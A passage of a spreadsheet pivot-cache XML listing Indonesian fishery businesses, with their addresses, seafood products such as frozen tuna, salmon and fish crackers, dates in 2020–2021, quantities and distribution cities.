    <s v="PT. HALAL INTERNUSA MEGA"/>
    <s v="Kawasan Industri dan Pergudangan Marunda Center Blok Q2 No.23A, Jl. Marunda Makmur, Kel. Segaramakmur, Kec. Tarumanegara, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Cephalopoda Kering (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-16T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Utara, Kabupaten Bogor"/>
    <m/>
  </r>
  <r>
    <n v="21335"/>
    <x v="59"/>
    <s v="PT. SATYA TRINADI KOMIRA PERKASA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Salmon Beku"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara, Kabupaten Bekasi, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="19259"/>
    <x v="384"/>
    <s v="PT. SHINMAS JAYA BAHARI"/>
    <s v="Jl. Margomulyo No.44 Komplek Suri Mulia Blok H-17, Kel. Asemrowo, Kec. Tambak Sari Oso, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Air Tawar Beku (Bandeng, Nila)"/>
    <d v="2020-04-08T00:00:00"/>
    <n v="15000"/>
    <s v="Kota Jakarta Timur, Kabupaten Probolinggo, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19414"/>
    <x v="197"/>
    <s v="MARIJO 88"/>
    <s v="Jl. Poros Pinrang - Pare-Pare Km 6, Kel. Manarang, Kec. Mattiro Bulu, Kabupaten Pinrang&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Amplang Bandeng"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="1000"/>
    <s v="Kabupaten Bone, Kota Makassar, Kota Palopo, Kota Kendari"/>
    <m/>
  </r>
  <r>
    <n v="19415"/>
    <x v="197"/>
    <s v="MARIJO 88"/>
    <s v="Jl. Poros Pinrang - Pare-Pare Km 6, Kel. Manarang, Kec. Mattiro Bulu, Kabupaten Pinrang&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tik-tik Bandeng"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="500"/>
    <s v="Kabupaten Bone, Kota Makassar, Kota Palopo, Kota Kendari"/>
    <m/>
  </r>
  <r>
    <n v="21374"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="20"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="21375"/>
    <x v="201"/>
    <s v="PT. LUCKY SAMUDRA PRATAMA"/>
    <s v="Jl. Muara Baru Ujung Blok F No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="10"/>
    <s v="Kota Jakarta Barat, Kota Jakarta Utara, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="19349"/>
    <x v="407"/>
    <s v="CV. LAUTAN MAS"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM 3, Kel. Mabar, Kec. Medan Deli , Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Cod, Halibut, Seabass)"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="200"/>
    <s v="Kota Medan, Kota Jakarta Selatan, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20848"/>
    <x v="398"/>
    <s v="PT. GEMA MANGGALA CHEMINDO"/>
    <s v="Pergudangan Biz Point Blok Hokkaido No.60, Jl. Raya Pemda Tigaraksa, Kel. Sukamulya, Kec. Cikupa, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Minyak Hati Cod"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="32500"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Depok"/>
    <m/>
  </r>
  <r>
    <n v="20851"/>
    <x v="398"/>
    <s v="PT. GEMA MANGGALA CHEMINDO"/>
    <s v="Pergudangan Biz Point Blok Hokkaido No.60, Jl. Raya Pemda Tigaraksa, Kel. Sukamulya, Kec. Cikupa, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Squalene"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Depok"/>
    <m/>
  </r>
  <r>
    <n v="19329"/>
    <x v="100"/>
    <s v="PT. SALIM JAYA"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM III, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Salmon Beku"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Medan, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19345"/>
    <x v="100"/>
    <s v="PT. SALIM JAYA"/>
    <s v="Jl. Pulau Nias Selatan No.1 KIM III, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Scallop Beku"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Medan, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19459"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="19460"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Segar"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="19461"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No. 3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Telur Salmon Beku"/>
    <d v="2020-03-06T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="20193"/>
    <x v="408"/>
    <s v="PT, CILACAP SAMUDERA FISHING INDUSTRY"/>
    <s v="Kompleks PPS Kendari, Jl, Samudera No,1, Kel, Puday, Kec, Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Barakuda, Tongkol, Kembung, Makerel, Lemadang, Layaran, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-05-11T00:00:00"/>
    <n v="900000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="20274"/>
    <x v="409"/>
    <s v="PT. ALAM BARU REKOR"/>
    <s v="Jl. Raya Sagerat, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Demersal Beku (Kuwe, Kerapu, Kakatua, Kakap, Barramundi)"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="20399"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No.3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Sidat Panggang Beku"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="20401"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No.3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Stik Kepiting Analog, Kue Ikan Kibun Narutomaki)"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="20406"/>
    <x v="42"/>
    <s v="PT. SANJAYA INTERNASIONAL FISHERY"/>
    <s v="Kawasan Pelabuhan Perikanan Muara Angke, Jl. Pendaratan Ikan No.3 Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Wakame Beku"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="0"/>
    <s v="Kabupaten Bangka, Kabupaten Belitung, Kota Batam"/>
    <m/>
  </r>
  <r>
    <n v="20019"/>
    <x v="410"/>
    <s v="PT. GLOBAL BUANA MANDIRI"/>
    <s v="Jl. Muara Baru Blok A No.1-3 RT 06 RW 07, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Rumput Laut Panggang"/>
    <d v="2020-07-09T00:00:00"/>
    <n v="8000"/>
    <s v="Kota Jakarta Utara, Kota Bandung, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19897"/>
    <x v="411"/>
    <s v="PT. MACKESSEN FOODTECH INDONESIA"/>
    <s v="Taman Tekno BSD Sektor XI Blok H2 No.29, Kel. Setu, Kec. Setu, Kota Tangerang Selatan&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tepung Karagenan"/>
    <d v="2020-07-06T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara, Kota Bekasi, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="20290"/>
    <x v="401"/>
    <s v="PT. KELOLA MINA LAUT UNIT LUWUK"/>
    <s v="Jl. Raya - Luwuk Biak Km 8, Kel. Boyou, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah"/>
    <n v="28"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-08T00:00:00"/>
    <n v="25000"/>
    <s v="Kabupaten Gresik, Kota Surabaya, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="19295"/>
    <x v="412"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Lemuru, Tongkol, Julung-julung, Kembung, Marlin, Layaran, Layang, Perak-perak, Cakalang, Pedang)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara, Kota Denpasar, Kota Ambon"/>
    <m/>
  </r>
  <r>
    <n v="19383"/>
    <x v="413"/>
    <s v="PT. ARABIKATAMA KHATULISTIWA FISHING INDUSTRY"/>
    <s v="Kompleks Dermaga TNI-AU Pattimura, Kel. Laha, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Cakalang)"/>
    <d v="2020-01-24T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Timur, Kota Surabaya, Kota Ambon"/>
    <m/>
  </r>
  <r>
    <n v="20601"/>
    <x v="414"/>
    <s v="PT. SAMUDERA SAKTI SEPAKAT"/>
    <s v="Dusun Air Manis, Kel. Laha, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Deho, Layang, Cakalang)"/>
    <d v="2020-10-14T00:00:00"/>
    <n v="113460"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya, Kota Ambon"/>
    <m/>
  </r>
  <r>
    <n v="21087"/>
    <x v="399"/>
    <s v="MAWAR LESTARI"/>
    <s v="Jl. Moch Roem RT 03, Kel. Bontang Lestari, Kec. Bontang Selatan, Kota Bontang&lt;br&gt;Kalimantan Timur"/>
    <n v="23"/>
    <s v="Amplang Ikan"/>
    <d v="2020-08-25T00:00:00"/>
    <n v="360"/>
    <s v="Kota Balikpapan, Kota Samarinda, Kota Bontang"/>
    <m/>
  </r>
  <r>
    <n v="21239"/>
    <x v="205"/>
    <s v="PT, INDO AMERICAN SEAFOODS"/>
    <s v="Jl, Ir, Sutami Km,13, Kel, Sukanegara, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Bernilai Tambah Beku (Bakso Udang)"/>
    <d v="2020-07-10T00:00:00"/>
    <n v="1463386.5"/>
    <s v="Kabupaten Lampung Selatan, Kota Jakarta Pusat"/>
    <m/>
  </r>
  <r>
    <n v="17208"/>
    <x v="415"/>
    <s v="PT. CARVINNA TRIJAYA MAKMUR"/>
    <s v="Jl. Arnoldus Sompotan, Kel. Aertembaga I, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Kaleng"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="51000"/>
    <s v="Kota Jakarta Pusat, Kota Manado, Kota Bitung"/>
    <m/>
  </r>
  <r>
    <n v="19413"/>
    <x v="197"/>
    <s v="MARIJO 88"/>
    <s v="Jl. Poros Pinrang - Pare-Pare Km 6, Kel. Manarang, Kec. Mattiro Bulu, Kabupaten Pinrang&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Bandeng) "/>
    <d v="2020-02-14T00:00:00"/>
    <n v="5000"/>
    <s v="Kabupaten Bone, Kota Makassar, Kota Palopo"/>
    <m/>
  </r>
  <r>
    <n v="19792"/>
    <x v="416"/>
    <s v="PT. SARANA YEOMAN SEMBADA"/>
    <s v="Jl. Pattimura RT 002 RW 002 Teluk Nipah, Telaga Punggur, Kel. Kabil, Kec. Nongsa, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Mata Besar, Tongkol, Alu-alu, Kembung, Marlin, Selar, Layang, Tenggiri)"/>
    <d v="2020-02-18T00:00:00"/>
    <n v="160000"/>
    <s v="Kota Jambi, Kota Batam, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="19954"/>
    <x v="416"/>
    <s v="PT. SARANA YEOMAN SEMBADA"/>
    <s v="Jl. Pattimura RT 002 RW 002 Teluk Nipah, Telaga Punggur, Kel. Kabil, Kec. Nongsa, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Demersal Beku (Swanggi, Manyung, Kerapu, Layur, Bawal, Kakap, Kurisi)"/>
    <d v="2020-02-18T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jambi, Kota Batam, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="20711"/>
    <x v="417"/>
    <s v="SUMINI MISNU"/>
    <s v="Dusun Sido Mulyo RT 005, Kel. Kota Baru, Kec. Geragai, Kabupaten Tanjung Jabung Timur&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Kerupuk Udang"/>
    <d v="2021-03-17T00:00:00"/>
    <n v="140"/>
    <s v="Kabupaten Tanjung Jabung Timur, Kota Jambi"/>
    <m/>
  </r>
  <r>
    <n v="17272"/>
    <x v="418"/>
    <s v="PT. EBIMAS BESAR"/>
    <s v="Jl. A.Yani Km 45,6, Kel. Pulau Sari, Kec. Tambang Ulang, Kabupaten Tanah Laut&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Kerapu, Layur, Kakap)"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Tanah Laut"/>
    <m/>
  </r>
  <r>
    <n v="17273"/>
    <x v="418"/>
    <s v="PT. EBIMAS BESAR"/>
    <s v="Jl. A.Yani Km 45,6, Kel. Pulau Sari, Kec. Tambang Ulang, Kabupaten Tanah Laut&lt;br&gt;Kalimantan Selatan"/>
    <n v="22"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layang, Tenggiri)"/>
    <d v="2021-06-04T00:00:00"/>
    <n v="12000"/>
    <s v="Kota Jakarta Pusat, Kabupaten Tanah Laut"/>
    <m/>
  </r>
  <r>
    <n v="19694"/>
    <x v="419"/>
    <s v="MENTARI"/>
    <s v="Wonsobo I RT 03 RW 01, Kel. Banjarejo, Kec. Tanjungsari, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Tahu Bakso Ikan)"/>
    <d v="2020-03-03T00:00:00"/>
    <n v="432"/>
    <s v="Kabupaten Gunung Kidul, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="19698"/>
    <x v="419"/>
    <s v="MENTARI"/>
    <s v="Wonsobo I RT 03 RW 01, Kel. Banjarejo, Kec. Tanjungsari, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Krispy Ikan, Krispy Kulit Ikan, Krispy Rumput"/>
    <d v="2020-03-03T00:00:00"/>
    <n v="720"/>
    <s v="Kabupaten Gunung Kidul, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="19699"/>
    <x v="419"/>
    <s v="MENTARI"/>
    <s v="Wonsobo I RT 03 RW 01, Kel, Banjarejo, Kec, Tanjungsari, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Abon Ikan"/>
    <d v="2020-03-03T00:00:00"/>
    <s v="03/01/1900  14,04,00"/>
    <s v="Kabupaten Gunung Kidul, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="19700"/>
    <x v="419"/>
    <s v="MENTARI"/>
    <s v="Wonsobo I RT 03 RW 01, Kel. Banjarejo, Kec. Tanjungsari, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Kerupuk Ikan, Kerupuk Udang, Kerupuk Rumput Laut"/>
    <d v="2020-03-03T00:00:00"/>
    <n v="144"/>
    <s v="Kabupaten Gunung Kidul, Kota Yogyakarta"/>
    <m/>
  </r>
  <r>
    <n v="20315"/>
    <x v="158"/>
    <s v="PT. DUTA BUANA PACIFIC"/>
    <s v="Komplek PPN Tanjungpandan, Jl. RE Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="1100"/>
    <s v="Kota Pangkal Pinang, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="21332"/>
    <x v="59"/>
    <s v="PT. SATYA TRINADI KOMIRA PERKASA"/>
    <s v="Komplek Pergudangan Kosambi Permai Blok. KK19 Desa Jatimulya Kab. Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Segar (Deho, Layang, Cakalang)"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="17264"/>
    <x v="420"/>
    <s v="UD. EKA TIRTA"/>
    <s v="Kampung Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Lemadang, Marlin, Layang, Cakalang)"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="300000"/>
    <s v="Kabupaten Banyuwangi, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="17265"/>
    <x v="420"/>
    <s v="UD. EKA TIRTA"/>
    <s v="Kampung Jati, Kel. Labuhan Lombok, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Pelagis Segar (Baby Tuna, Tongkol, Lemadang, Marlin, Layaran, Layang, Cakalang)"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Banyuwangi, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="17231"/>
    <x v="421"/>
    <s v="PT. PUTRI GUMILANG SEJAHTERA"/>
    <s v="Jl Ringroad Dusun Pereng RT 001 RW 007, Kel. Gendong Kulon, Kec. Babat, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Tongkol, Kembung, Layang, Cakalang, Salem)"/>
    <d v="2020-01-27T00:00:00"/>
    <n v="200000"/>
    <s v="Kabupaten Lamongan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19291"/>
    <x v="412"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Lencam, Kerapu, Layur, Kakatua, Kakap Merah, Merah, Kurisi)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="19292"/>
    <x v="412"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="19293"/>
    <x v="412"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="19294"/>
    <x v="412"/>
    <s v="PT. INTIMAS SURYA"/>
    <s v="Jl. Sultan Hasanuddin, Kompleks PPN Tantui Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Utara, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="20067"/>
    <x v="196"/>
    <s v="PT. HARTA SAMUDRA"/>
    <s v="Desa Daeo Majiko, Kec. Morotai Selatan, Kabupaten Pulau Morotai&lt;br&gt;Maluku Utara"/>
    <n v="32"/>
    <s v="Ikan Demesal Beku (Barramundi, Kerapu, Layur, Kakap Merah, Ayam-ayam)"/>
    <d v="2020-03-18T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20273"/>
    <x v="409"/>
    <s v="PT. ALAM BARU REKOR"/>
    <s v="Jl. Raya Sagerat, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang)"/>
    <d v="2020-04-14T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20471"/>
    <x v="97"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG AMBON"/>
    <s v="Jl. Kapten Piere Tendean, Kel. Galala, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Beku (Kakap Putih, Gulama, Kerapu, Marlin, Kakatua, Kakap Merah, Layaran)"/>
    <d v="2020-04-27T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20474"/>
    <x v="97"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG AMBON"/>
    <s v="Jl. Kapten Piere Tendean, Kel. Galala, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-04-27T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20475"/>
    <x v="97"/>
    <s v="PT. PERIKANAN NUSANTARA (PERSERO) CABANG AMBON"/>
    <s v="Jl. Kapten Piere Tendean, Kel. Galala, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Cephalopoda Segar (Gurita, Cumi-cumi)"/>
    <d v="2020-04-27T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20703"/>
    <x v="422"/>
    <s v="PT. SUMBER ANUGERAH BAHARI"/>
    <s v="Jl. Sagerat Tanjung Merah, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Malalugis, Cakalang)"/>
    <d v="2020-06-30T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="20737"/>
    <x v="413"/>
    <s v="PT. ARABIKATAMA KHATULISTIWA FISHING INDUSTRY"/>
    <s v="Kompleks Dermaga TNI-AU Pattimura, Kel. Laha, Kec. Teluk Ambon, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Beku"/>
    <d v="2020-06-16T00:00:00"/>
    <n v="20000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21020"/>
    <x v="423"/>
    <s v="PT. PATRIA PERIKANAN LESTARI INDONESIA"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Pelagis Beku (Kembung, Marlin, Layaran, Layang, Cakalang)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="126000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21021"/>
    <x v="423"/>
    <s v="PT. PATRIA PERIKANAN LESTARI INDONESIA"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Beku"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="131000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21022"/>
    <x v="423"/>
    <s v="PT. PATRIA PERIKANAN LESTARI INDONESIA"/>
    <s v="Komplek Pelabuhan Perikanan Nusantara Ambon, Kel. Pandan Kasturi, Kec. Sirimau, Kota Ambon&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Ikan Demersal Beku (Barramundi, Gulama, Lencam, Kerapu, Kakap)"/>
    <d v="2020-08-31T00:00:00"/>
    <n v="5000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="21023"/>
    <x v="423"/>
